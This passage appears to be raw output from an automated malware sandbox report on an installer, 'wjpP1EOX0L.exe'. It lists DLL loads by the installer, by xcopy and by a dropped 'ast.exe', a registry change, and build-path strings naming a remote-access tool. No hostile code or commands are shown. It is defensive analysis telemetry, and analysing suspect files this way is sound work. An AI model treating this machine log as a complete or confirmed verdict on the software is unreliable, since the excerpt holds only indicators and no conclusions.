                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\wjpP1EOX0L.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\wjpP1EOX0L.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpSection loaded: msimg32.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpSection loaded: mpr.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpSection loaded: shfolder.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpSection loaded: rstrtmgr.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpSection loaded: textshaping.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpSection loaded: dwmapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpSection loaded: sfc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpSection loaded: sfc_os.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpSection loaded: explorerframe.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ulib.dllJump to behavior
                          Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ifsutil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: devobj.dllJump to behavior
                          Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: fsutilext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: olepro32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: wsock32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: wtsapi32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: netapi32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: shfolder.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: sqlite3.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: netapi32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: crtdll.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: msacm32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: quartz.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: msvfw32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: avifil32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: winmmbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: winmmbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: wkscli.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: logoncli.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: samcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: colorui.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: mscms.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: coloradapterclient.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: compstui.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: msimg32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: inetres.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: msimg32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: dwmapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: security.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: winsta.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: scrrun.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: sxs.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: dbghelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: dbgcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: cscapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: d3d11.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: dxgi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: astcrp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: libssl-1_1.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: libcrypto-1_1.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: libcrypto-1_1.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: vcruntime140.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: vcruntime140.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: napinsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: pnrpnsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: wshbth.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: nlaapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: winrnr.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: powrprof.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: umpdc.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: dataexchange.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: dcomp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: twinapi.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: symsrv.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: olepro32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: wsock32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: wtsapi32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: netapi32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: shfolder.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: sqlite3.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: netapi32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: crtdll.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: msacm32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: quartz.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: msvfw32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: avifil32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: winmmbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: winmmbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: wkscli.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: logoncli.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: samcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: colorui.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: mscms.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: coloradapterclient.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: compstui.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: msimg32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: inetres.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: msimg32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: dwmapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: security.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: winsta.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: scrrun.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: sxs.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                          Source: C:\Windows\SysWOW64\xcopy.exeFile written: C:\Users\user\AppData\Roaming\im\config.iniJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpWindow found: window name: TMainFormJump to behavior
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: wjpP1EOX0L.exeStatic file information: File size 6810986 > 1048576
                          Source: wjpP1EOX0L.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                          Source: Binary string: D:\ProjectsVS2015\OpenSSL\openssl-1.1.1l\libcrypto-1_1.pdb source: xcopy.exe, 00000009.00000003.2089288252.00000000035B2000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.2999895866.000000006BE30000.00000002.00000001.01000000.00000014.sdmp
                          Source: Binary string: C:\OpenSSL\Temp\openssl-1.0.2u-x32\out32dll\ssleay32.pdb source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385110004.00000000033F8000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: C:\OpenSSL\Temp\openssl-1.0.2u-x32\out32dll\libeay32.pdb source: xcopy.exe, 00000009.00000003.2096546624.00000000033F9000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\AstRct.pdb source: xcopy.exe, 00000009.00000003.2087883460.00000000033F7000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3002416551.000000006C1CF000.00000002.00000001.01000000.00000011.sdmp, astrct.dll.9.dr
                          Source: Binary string: D:\Projects\Delphi\_Assistant\10_FSTEK_02\00_Bin\Hatls.pdb source: xcopy.exe, 00000009.00000003.2088110800.00000000035D3000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3005322508.000000006C482000.00000002.00000001.01000000.00000010.sdmp
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\libjpeg-turbo-win.pdb source: xcopy.exe, 00000009.00000003.2096624002.000000000341C000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: D:\Projects\Delphi\_Assistant\10_FSTEK_02\00_Bin\Hatls.pdbf source: xcopy.exe, 00000009.00000003.2088110800.00000000035D3000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3005322508.000000006C482000.00000002.00000001.01000000.00000010.sdmp
                          Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: ast.exe, 0000000A.00000002.2999895866.000000006BDC7000.00000002.00000001.01000000.00000014.sdmp
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\AstClient.pdb source: ast.exe, 0000000A.00000002.3007667489.000000006CFB3000.00000002.00000001.01000000.0000000F.sdmp, is-951GK.tmp.3.dr
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\AstRct.pdbM6 source: xcopy.exe, 00000009.00000003.2087883460.00000000033F7000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3002416551.000000006C1CF000.00000002.00000001.01000000.00000011.sdmp, astrct.dll.9.dr
                          Source: Binary string: vcruntime140.i386.pdb source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385212736.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3008128485.000000006F701000.00000020.00000001.01000000.00000015.sdmp
                          Source: Binary string: vcruntime140.i386.pdbGCTL source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385212736.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3008128485.000000006F701000.00000020.00000001.01000000.00000015.sdmp
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\libjpeg-turbo-win.pdb! source: xcopy.exe, 00000009.00000003.2096624002.000000000341C000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: vcomp140.i386.pdbGCTL source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385162742.00000000033F8000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: D:\CFILES\Projects\WinSSL\openssl-1.1.0g\libcrypto-1_1.pdb source: xcopy.exe, 00000009.00000003.2094846139.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, is-VCJTB.tmp.3.dr
                          Source: Binary string: msvcr120.i386.pdb source: xcopy.exe, 00000009.00000003.2097728621.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, msvcr120.dll.9.dr
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\AstClient.pdbe source: ast.exe, 0000000A.00000002.3007667489.000000006CFB3000.00000002.00000001.01000000.0000000F.sdmp, is-951GK.tmp.3.dr
                          Source: Binary string: C:\OpenSSL\Temp\openssl-1.0.2u-x32\out32dll\ssleay32.pdb@W source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385110004.00000000033F8000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: .pdbnes\AppData\Roaming\im\ source: ast.exe, 0000000A.00000002.2978052448.000000000019A000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: D:\ProjectsVS2015\OpenSSL\openssl-1.1.1l\libssl-1_1.pdb@@ source: xcopy.exe, 00000009.00000003.2097505417.0000000003418000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3006758328.000000006CA31000.00000002.00000001.01000000.00000013.sdmp, is-UA1D6.tmp.3.dr
                          Source: Binary string: C:\Users\user\AppData\Roaming\im\ast.pdb\*D{ source: ast.exe, 0000000A.00000002.2978052448.000000000019A000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: vcomp140.i386.pdb source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385162742.00000000033F8000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: D:\ProjectsVS2015\OpenSSL\openssl-1.1.1l\libssl-1_1.pdb source: xcopy.exe, 00000009.00000003.2097505417.0000000003418000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3006758328.000000006CA31000.00000002.00000001.01000000.00000013.sdmp, is-UA1D6.tmp.3.dr
                          Source: Binary string: C:\Users\user\AppData\Roaming\im\ast.pdb source: ast.exe, 0000000A.00000002.2978052448.000000000019A000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASMOpenSSL 1.1.1l 24 Aug 2021built on: Tue Sep 7 07:24:19 2021 UTCplatform: VC-WIN32OPENSSLDIR: "C:\Program Files (x86)\Common Files\SSL"ENGINESDIR: "C:\Program Files (x86)\OpenSSL\lib\engines-1_1"not availabledes(long) source: ast.exe, 0000000A.00000002.2999895866.000000006BDC7000.00000002.00000001.01000000.00000014.sdmp
